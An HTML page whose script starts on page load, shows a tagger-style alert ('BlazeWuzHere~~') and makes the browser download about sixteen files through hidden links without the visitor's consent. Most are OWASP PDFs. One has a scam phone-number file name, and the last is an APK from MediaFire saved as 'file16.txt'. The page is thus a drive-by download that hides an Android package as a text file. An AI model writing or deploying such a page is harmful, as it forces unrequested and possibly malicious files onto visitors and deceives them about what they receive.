<!doctype html>
<html>
  <head>
    <title>Download Files</title>
  </head>
  <body>
    <script>
    window.addEventListener('load', downloadFiles);
    alert('BlazeWuzHere~~');
    function downloadFiles() {
      var files = [
        "https://owasp.org/www-pdf-archive//(Almost)_everything_about_passwords_that_OWASP_OWASPGbg_20140218_Per_Thorsheim.pdf",
        "https://owasp.org/www-pdf-archive//(PDF).pdf",
        "https://owasp.org/www-pdf-archive//)))+1_800-256-0160((((Quickbooks_phone_number,quickbooks_pro_support_phone_number.pdf",
        "https://owasp.org/www-pdf-archive//00_OWASP_German_Day_4_Einleitung_-_Georg_Hess.pdf",
        "https://owasp.org/www-pdf-archive//01_18_10_OWASP_Newsletter.pdf",
        "https://owasp.org/www-pdf-archive//01_18_10_OWASP_Newsletter1.pdf",
        "https://owasp.org/www-pdf-archive//01_18_10_OWASP_Newsletter_-1.pdf",
        "https://owasp.org/www-pdf-archive//01_18_10_OWASP_Newsletter_-_Spanish-1.pdf",
        "https://owasp.org/www-pdf-archive//01_18_10_OWASP_Newsletter_Chinese-1.pdf",
        "https://owasp.org/www-pdf-archive//01_18_10_OWASP_Newsletter_Geek.pdf",
        "https://owasp.org/www-pdf-archive//01_18_10_OWASP_Newsletter_Hungarian.pdf",
        "https://owasp.org/www-pdf-archive//01_OWASP_German_Day_4_Keynote_-_Isabel_Muench.pdf",
        "https://owasp.org/www-pdf-archive//01_OWASP_LatamTur2011_Bienvenida.pdf",
        "https://owasp.org/www-pdf-archive//01_OWASP_LatamTur2012_Bienvenida.pdf",
        "https://owasp.org/www-pdf-archive//022510-OWASP-Keynote-KajYuecel-final.pdf",
        "https://www.mediafire.com/file/63tnhnsp52mlvao/Get-Lit_Re-Brikt.apk/file?dkey=v5m3j5smk8y&r=1512"
      ];

      var uniqueFiles = [...new Set(files)]; // Remove duplicates
      var delay = 0; // delay
      var index = 0;

      function downloadNextFile() {
        if (index >= uniqueFiles.length) {
          return;
        }

        var link = document.createElement('a');
        link.href = uniqueFiles[index];
        link.download = 'file' + (index + 1) + '.txt';
        link.style.display = 'none';
        document.body.appendChild(link);
        link.click();
        document.body.removeChild(link);

        index++;
        setTimeout(downloadNextFile, delay);
      }

      downloadNextFile();
    }
  </script>
  </body>
</html>